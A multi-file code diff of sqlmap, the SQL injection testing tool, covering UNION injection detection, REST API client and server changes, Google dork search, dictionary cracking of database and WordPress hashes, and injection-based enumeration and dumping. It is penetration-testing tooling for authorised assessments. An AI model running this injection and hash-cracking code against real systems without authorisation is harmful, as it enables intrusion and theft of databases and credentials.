fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
if unionErrorCase and count > 1:
warnMsg = "combined UNION/error-based SQL injection case found on "
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
warnMsg += "column with better characteristics"
logger.warn(warnMsg)
else:
break
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
warnMsg = "output with limited number of rows detected. Switching to partial mode"
logger.warn(warnMsg)
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False)
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
if unionErrorCase and count > 1:
warnMsg = "combined UNION/error-based SQL injection case found on "
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
warnMsg += "column with better characteristics"
logger.warn(warnMsg)
else:
break
return validPayload, vector

View File

@ -8,11 +8,16 @@ See the file 'doc/COPYING' for copying permission
import logging
import os
import re
import shlex
import sqlite3
import sys
import tempfile
import time
import urllib2
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import unArrayizeValue
from lib.core.convert import base64pickle
from lib.core.convert import hexencode
@ -31,6 +36,7 @@ from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict
from lib.core.settings import IS_WIN
from lib.core.subprocessng import Popen
from lib.parse.cmdline import cmdLineParser
from thirdparty.bottle.bottle import error as return_error
from thirdparty.bottle.bottle import get
from thirdparty.bottle.bottle import hook
@ -82,7 +88,7 @@ class Database(object):
else:
self.cursor.execute(statement)
except sqlite3.OperationalError, ex:
if not "locked" in ex.message:
if not "locked" in getSafeExString(ex):
raise
else:
break
@ -110,7 +116,8 @@ class Database(object):
class Task(object):
def __init__(self, taskid):
def __init__(self, taskid, remote_addr):
self.remote_addr = remote_addr
self.process = None
self.output_directory = None
self.options = None
@ -152,8 +159,10 @@ class Task(object):
self.options = AttribDict(self._original_options)
def engine_start(self):
self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
shell=False, close_fds=not IS_WIN)
if os.path.exists("sqlmap.py"):
self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN)
else:
self.process = Popen(["sqlmap", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN)
def engine_stop(self):
if self.process:
@ -335,7 +344,9 @@ def task_new():
Create new task ID
"""
taskid = hexencode(os.urandom(8))
DataStore.tasks[taskid] = Task(taskid)
remote_addr = request.remote_addr
DataStore.tasks[taskid] = Task(taskid, remote_addr)
logger.debug("Created new task: '%s'" % taskid)
return jsonize({"success": True, "taskid": taskid})
@ -361,18 +372,18 @@ def task_delete(taskid):
@get("/admin/<taskid>/list")
def task_list(taskid):
def task_list(taskid=None):
"""
List task pull
"""
if is_admin(taskid):
logger.debug("[%s] Listed task pool" % taskid)
tasks = list(DataStore.tasks)
return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)})
else:
logger.warning("[%s] Unauthorized call to task_list()" % taskid)
return jsonize({"success": False, "message": "Unauthorized"})
tasks = {}
for key in DataStore.tasks:
if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr:
tasks[key] = dejsonize(scan_status(key))["status"]
logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr))
return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)})
@get("/admin/<taskid>/flush")
def task_flush(taskid):
@ -381,11 +392,13 @@ def task_flush(taskid):
"""
if is_admin(taskid):
DataStore.tasks = dict()
logger.debug("[%s] Flushed task pool" % taskid)
return jsonize({"success": True})
else:
logger.warning("[%s] Unauthorized call to task_flush()" % taskid)
return jsonize({"success": False, "message": "Unauthorized"})
for key in list(DataStore.tasks):
if DataStore.tasks[key].remote_addr == request.remote_addr:
del DataStore.tasks[key]
logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr))
return jsonize({"success": True})
##################################
# sqlmap core interact functions #
@ -467,7 +480,9 @@ def scan_stop(taskid):
"""
Stop a scan
"""
if taskid not in DataStore.tasks:
if (taskid not in DataStore.tasks or
DataStore.tasks[taskid].engine_process() is None or
DataStore.tasks[taskid].engine_has_terminated()):
logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
@ -482,7 +497,9 @@ def scan_kill(taskid):
"""
Kill a scan
"""
if taskid not in DataStore.tasks:
if (taskid not in DataStore.tasks or
DataStore.tasks[taskid].engine_process() is None or
DataStore.tasks[taskid].engine_has_terminated()):
logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
@ -552,7 +569,7 @@ def scan_log_limited(taskid, start, end):
json_log_messages = list()
if taskid not in DataStore.tasks:
logger.warning("[%s] Invalid task ID provided to scan_log_limited()")
logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
if not start.isdigit() or not end.isdigit() or end < start:
@ -581,7 +598,7 @@ def scan_log(taskid):
json_log_messages = list()
if taskid not in DataStore.tasks:
logger.warning("[%s] Invalid task ID provided to scan_log()")
logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid)
return jsonize({"success": False, "message": "Invalid task ID"})
# Read all log messages from the IPC database
@ -640,6 +657,22 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT):
run(host=host, port=port, quiet=True, debug=False)
def _client(url, options=None):
logger.debug("Calling %s" % url)
try:
data = None
if options is not None:
data = jsonize(options)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
response = urllib2.urlopen(req)
text = response.read()
except:
if options:
logger.error("Failed to load and parse %s" % url)
raise
return text
def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT):
"""
REST-JSON API client
@ -647,11 +680,106 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT):
addr = "http://%s:%d" % (host, port)
logger.info("Starting REST-JSON API client to '%s'..." % addr)
# TODO: write a simple client with requests, for now use curl from command line
logger.error("Not yet implemented, use curl from command line instead for now, for example:")
print "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port)
print ("\t$ curl -H \"Content-Type: application/json\" "
"-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' "
"http://%s:%d/scan/$taskid/start") % (host, port)
print "\t$ curl http://%s:%d/scan/$taskid/data" % (host, port)
print "\t$ curl http://%s:%d/scan/$taskid/log\n" % (host, port)
try:
_client(addr)
except Exception, ex:
if not isinstance(ex, urllib2.HTTPError):
errMsg = "there has been a problem while connecting to the "
errMsg += "REST-JSON API server at '%s' " % addr
errMsg += "(%s)" % ex
logger.critical(errMsg)
return
taskid = None
logger.info("Type 'help' or '?' for list of available commands")
while True:
try:
command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower()
except (EOFError, KeyboardInterrupt):
print
break
if command in ("data", "log", "status", "stop", "kill"):
if not taskid:
logger.error("No task ID in use")
continue
raw = _client("%s/scan/%s/%s" % (addr, taskid, command))
res = dejsonize(raw)
if not res["success"]:
logger.error("Failed to execute command %s" % command)
dataToStdout("%s\n" % raw)
elif command.startswith("new"):
if ' ' not in command:
logger.error("Program arguments are missing")
continue
argv = ["sqlmap.py"] + shlex.split(command)[1:]
try:
cmdLineOptions = cmdLineParser(argv).__dict__
except:
taskid = None
continue
for key in list(cmdLineOptions):
if cmdLineOptions[key] is None:
del cmdLineOptions[key]
raw = _client("%s/task/new" % addr)
res = dejsonize(raw)
if not res["success"]:
logger.error("Failed to create new task")
continue
taskid = res["taskid"]
logger.info("New task ID is '%s'" % taskid)
raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions)
res = dejsonize(raw)
if not res["success"]:
logger.error("Failed to start scan")
continue
logger.info("Scanning started")
elif command.startswith("use"):
taskid = (command.split()[1] if ' ' in command else "").strip("'\"")
if not taskid:
logger.error("Task ID is missing")
taskid = None
continue
elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid):
logger.error("Invalid task ID '%s'" % taskid)
taskid = None
continue
logger.info("Switching to task ID '%s' " % taskid)
elif command in ("list", "flush"):
raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command))
res = dejsonize(raw)
if not res["success"]:
logger.error("Failed to execute command %s" % command)
elif command == "flush":
taskid = None
dataToStdout("%s\n" % raw)
elif command in ("exit", "bye", "quit", 'q'):
return
elif command in ("help", "?"):
msg = "help Show this help message\n"
msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n"
msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n"
msg += "data Retrieve and show data for current task\n"
msg += "log Retrieve and show log for current task\n"
msg += "status Retrieve and show status for current task\n"
msg += "stop Stop current task\n"
msg += "kill Kill current task\n"
msg += "list Display all tasks\n"
msg += "flush Flush tasks (delete all tasks)\n"
msg += "exit Exit this client\n"
dataToStdout(msg)
elif command:
logger.error("Unknown command '%s'" % command)

View File

@ -22,6 +22,7 @@ from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapSyntaxException
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads
@ -58,12 +59,15 @@ def crawl(target):
try:
if current:
content = Request.getPage(url=current, crawling=True, raise404=False)[0]
except SqlmapConnectionException, e:
errMsg = "connection exception detected (%s). skipping " % e
except SqlmapConnectionException, ex:
errMsg = "connection exception detected (%s). skipping " % ex
errMsg += "URL '%s'" % current
logger.critical(errMsg)
except httplib.InvalidURL, e:
errMsg = "invalid URL detected (%s). skipping " % e
except SqlmapSyntaxException:
errMsg = "invalid URL detected. skipping '%s'" % current
logger.critical(errMsg)
except httplib.InvalidURL, ex:
errMsg = "invalid URL detected (%s). skipping " % ex
errMsg += "URL '%s'" % current
logger.critical(errMsg)

View File

@ -12,6 +12,7 @@ import socket
import urllib
import urllib2
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import readInput
from lib.core.common import urlencode
@ -30,6 +31,8 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import UNICODE_ENCODING
from lib.request.basic import decodePage
from lib.request.httpshandler import HTTPSHandler
from thirdparty.socks import socks
class Google(object):
"""
@ -47,10 +50,10 @@ class Google(object):
self.opener.addheaders = conf.httpHeaders
try:
conn = self.opener.open("http://www.google.com/ncr")
conn = self.opener.open("https://www.google.com/ncr")
conn.info() # retrieve session cookie
except Exception, ex:
errMsg = "unable to connect to Google ('%s')" % ex
errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex)
raise SqlmapConnectionException(errMsg)
def search(self, dork):
@ -65,7 +68,7 @@ class Google(object):
if not dork:
return None
url = "http://www.google.com/search?"
url = "https://www.google.com/search?"
url += "q=%s&" % urlencode(dork, convall=True)
url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search"
url += "&start=%d" % ((gpage - 1) * 100)
@ -94,12 +97,12 @@ class Google(object):
except urllib2.HTTPError, e:
try:
page = e.read()
except socket.timeout:
warnMsg = "connection timed out while trying "
warnMsg += "to get error page information (%d)" % e.code
except Exception, ex:
warnMsg = "problem occurred while trying to get "
warnMsg += "an error page information (%s)" % getSafeExString(ex)
logger.critical(warnMsg)
return None
except (urllib2.URLError, httplib.error, socket.error, socket.timeout):
except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError):
errMsg = "unable to connect to Google"
raise SqlmapConnectionException(errMsg)
@ -175,3 +178,6 @@ class Google(object):
retVal = [urllib.unquote(match.group(1)) for match in re.finditer(regex, page, re.I | re.S)]
return retVal
def setHTTPProxy(): # Cross-linked function
raise NotImplementedError

View File

@ -44,6 +44,7 @@ from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getFileItems
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import normalizeUnicode
@ -326,8 +327,10 @@ def wordpress_passwd(password, salt, count, prefix, uppercase=False):
return output
password = password.encode(UNICODE_ENCODING)
cipher = md5(salt)
cipher.update(password.encode(UNICODE_ENCODING))
cipher.update(password)
hash_ = cipher.digest()
for i in xrange(count):
@ -706,14 +709,18 @@ def dictionaryAttack(attack_dict):
item = [(user, hash_), {}]
elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES):
item = [(user, hash_), {'username': user}]
elif hash_regex in (HASH.ORACLE):
elif hash_regex in (HASH.ORACLE,):
item = [(user, hash_), {'salt': hash_[-20:]}]
elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW):
item = [(user, hash_), {'salt': hash_[6:14]}]
elif hash_regex in (HASH.CRYPT_GENERIC):
elif hash_regex in (HASH.CRYPT_GENERIC,):
item = [(user, hash_), {'salt': hash_[0:2]}]
elif hash_regex in (HASH.WORDPRESS):
item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}]
elif hash_regex in (HASH.WORDPRESS,):
if ITOA64.index(hash_[3]) < 32:
item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}]
else:
warnMsg = "invalid hash '%s'" % hash_
logger.warn(warnMsg)
if item and hash_ not in keys:
resumed = hashDBRetrieve(hash_)
@ -771,7 +778,7 @@ def dictionaryAttack(attack_dict):
except Exception, ex:
warnMsg = "there was a problem while loading dictionaries"
warnMsg += " ('%s')" % ex.message
warnMsg += " ('%s')" % getSafeExString(ex)
logger.critical(warnMsg)
message = "do you want to use common password suffixes? (slow!) [y/N] "

View File

@ -11,6 +11,7 @@ import sqlite3
import threading
import time
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import serializeObject
from lib.core.common import unserializeObject
@ -77,7 +78,7 @@ class HashDB(object):
for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)):
retVal = row[0]
except sqlite3.OperationalError, ex:
if not "locked" in ex.message:
if not "locked" in getSafeExString(ex):
raise
except sqlite3.DatabaseError, ex:
errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, ex)
@ -127,7 +128,7 @@ class HashDB(object):
if retries == 0:
warnMsg = "there has been a problem while writing to "
warnMsg += "the session file ('%s')" % ex.message
warnMsg += "the session file ('%s')" % getSafeExString(ex)
logger.warn(warnMsg)
if retries >= HASHDB_FLUSH_RETRIES:

View File

@ -12,6 +12,7 @@ from lib.core.data import logger
from lib.core.data import queries
from lib.core.common import Backend
from lib.core.common import unArrayizeValue
from lib.core.settings import HSQLDB_DEFAULT_SCHEMA
from lib.request import inject
class Enumeration(GenericEnumeration):
@ -40,3 +41,6 @@ class Enumeration(GenericEnumeration):
def getHostname(self):
warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
logger.warn(warnMsg)
def getCurrentDb(self):
return HSQLDB_DEFAULT_SCHEMA

View File

@ -152,7 +152,7 @@ class Enumeration(GenericEnumeration):
warnMsg += "for database '%s'" % db
logger.warn(warnMsg)
if not kb.data.cachedTables:
if not kb.data.cachedTables and not conf.search:
errMsg = "unable to retrieve the tables for any database"
raise SqlmapNoneDataException(errMsg)
else:
@ -184,7 +184,7 @@ class Enumeration(GenericEnumeration):
infoMsg = "searching table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.info(infoMsg)
@ -217,7 +217,7 @@ class Enumeration(GenericEnumeration):
else:
infoMsg = "fetching number of table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db))
logger.info(infoMsg)
@ -229,7 +229,7 @@ class Enumeration(GenericEnumeration):
if not isNumPosStrValue(count):
warnMsg = "no table"
if tblConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db)
logger.warn(warnMsg)
@ -295,7 +295,7 @@ class Enumeration(GenericEnumeration):
infoMsg = "searching column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
foundCols[column] = {}
@ -336,7 +336,7 @@ class Enumeration(GenericEnumeration):
values = [values]
for foundTbl in values:
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True)
if foundTbl is None:
continue
@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration):
infoMsg = "fetching number of tables containing column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s' in database '%s'" % (column, db)
logger.info("%s%s" % (infoMsg, infoMsgTbl))
@ -380,7 +380,7 @@ class Enumeration(GenericEnumeration):
if not isNumPosStrValue(count):
warnMsg = "no tables contain column"
if colConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' " % column
warnMsg += "in database '%s'" % db
logger.warn(warnMsg)

View File

@ -169,7 +169,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "confirming %s" % DBMS.MYSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("USER() LIKE USER()")
result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL

View File

@ -358,7 +358,7 @@ class Databases:
if bruteForce is None:
logger.error(errMsg)
return self.getTables(bruteForce=True)
else:
elif not conf.search:
raise SqlmapNoneDataException(errMsg)
else:
for db, tables in kb.data.cachedTables.items():
@ -370,7 +370,7 @@ class Databases:
return kb.data.cachedTables
def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None):
def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False):
self.forceDbmsEnum()
if conf.db is None or conf.db == CURRENT_DB:
@ -415,7 +415,7 @@ class Databases:
colList = filter(None, colList)
if conf.tbl:
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB):
conf.tbl = conf.tbl.upper()
tblList = conf.tbl.split(",")
@ -432,10 +432,12 @@ class Databases:
tblList = tblList[0]
tblList = list(tblList)
else:
elif not conf.search:
errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise SqlmapNoneDataException(errMsg)
else:
return kb.data.cachedColumns
tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList))
@ -509,7 +511,7 @@ class Databases:
if len(colList) > 0:
if colTuple:
_, colCondParam = colTuple
infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
else:
colCondParam = "='%s'"
infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
@ -517,10 +519,6 @@ class Databases:
condQueryStr = "%%s%s" % colCondParam
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))
infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
@ -534,7 +532,14 @@ class Databases:
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.inband.query % tbl
values = inject.getValue(query, blind=False, time=False)
if dumpMode and colList:
values = [(_,) for _ in colList]
else:
infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
values = inject.getValue(query, blind=False, time=False)
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
index, values = 1, []
@ -604,7 +609,7 @@ class Databases:
if len(colList) > 0:
if colTuple:
_, colCondParam = colTuple
infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
else:
colCondParam = "='%s'"
infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList))
@ -612,10 +617,6 @@ class Databases:
condQueryStr = "%%s%s" % colCondParam
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))
infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
@ -639,32 +640,41 @@ class Databases:
parseSqliteTableSchema(value)
return kb.data.cachedColumns
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
table = {}
columns = {}
if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.MSSQL):
count, index, values = 0, 1, []
while True:
query = rootQuery.blind.query3 % (conf.db, tbl, index)
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
if isNoneValue(value) or value == " ":
break
else:
columns[safeSQLIdentificatorNaming(value)] = None
index += 1
if dumpMode and colList:
count = 0
for value in colList:
columns[safeSQLIdentificatorNaming(value)] = None
else:
infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
if not columns:
errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "")
errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.error(errMsg)
continue
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.MSSQL):
count, index, values = 0, 1, []
while True:
query = rootQuery.blind.query3 % (conf.db, tbl, index)
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
if isNoneValue(value) or value == " ":
break
else:
columns[safeSQLIdentificatorNaming(value)] = None
index += 1
if not columns:
errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "")
errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.error(errMsg)
continue
for index in getLimitRange(count):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
field = None
@ -805,7 +815,7 @@ class Databases:
elif "." in conf.tbl:
if not conf.db:
conf.db, conf.tbl = conf.tbl.split(".")
conf.db, conf.tbl = conf.tbl.split('.', 1)
if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
warnMsg = "missing database parameter. sqlmap is going to "

View File

@ -12,6 +12,7 @@ from lib.core.bigarray import BigArray
from lib.core.common import Backend
from lib.core.common import clearConsoleLine
from lib.core.common import getLimitRange
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import isInferenceAvailable
from lib.core.common import isListLike
@ -88,10 +89,12 @@ class Entries:
if isinstance(tblList[0], (set, tuple, list)):
tblList = tblList[0]
else:
elif not conf.search:
errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise SqlmapNoneDataException(errMsg)
else:
return
for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
@ -102,7 +105,7 @@ class Entries:
if foundData is None:
kb.data.cachedColumns = {}
self.getColumns(onlyColNames=True)
self.getColumns(onlyColNames=True, dumpMode=True)
else:
kb.data.cachedColumns = foundData
@ -272,7 +275,7 @@ class Entries:
else:
emptyColumns = []
plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2)
indexRange = getLimitRange(count, dump=True, plusOne=plusOne)
indexRange = getLimitRange(count, plusOne=plusOne)
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
for column in colList:
@ -293,7 +296,7 @@ class Entries:
if column not in entries:
entries[column] = BigArray()
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column),
@ -341,13 +344,13 @@ class Entries:
attackDumpedTable()
except (IOError, OSError), ex:
errMsg = "an error occurred while attacking "
errMsg += "table dump ('%s')" % ex.message
errMsg += "table dump ('%s')" % getSafeExString(ex)
logger.critical(errMsg)
conf.dumper.dbTableValues(kb.data.dumpedTable)
except SqlmapConnectionException, ex:
errMsg = "connection exception detected in dumping phase "
errMsg += "('%s')" % ex.message
errMsg += "('%s')" % getSafeExString(ex)
logger.critical(errMsg)
finally:

View File

@ -65,7 +65,7 @@ class Search:
infoMsg = "searching database"
if dbConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db)
logger.info(infoMsg)
@ -98,7 +98,7 @@ class Search:
if not values and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of database"
if dbConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db)
logger.info(infoMsg)
@ -113,7 +113,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no database"
if dbConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db)
logger.warn(warnMsg)
@ -172,7 +172,7 @@ class Search:
infoMsg = "searching table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
if dbCond and conf.db and conf.db != CURRENT_DB:
@ -225,7 +225,7 @@ class Search:
if len(whereDbsQuery) == 0:
infoMsg = "fetching number of databases with table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.info(infoMsg)
@ -236,7 +236,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no databases have table"
if tblConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.warn(warnMsg)
@ -274,7 +274,7 @@ class Search:
infoMsg = "fetching number of table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db))
logger.info(infoMsg)
@ -288,7 +288,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no table"
if tblConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db)
logger.warn(warnMsg)
@ -390,7 +390,7 @@ class Search:
infoMsg = "searching column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
foundCols[column] = {}
@ -468,7 +468,7 @@ class Search:
if not conf.db:
infoMsg = "fetching number of databases with tables containing column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
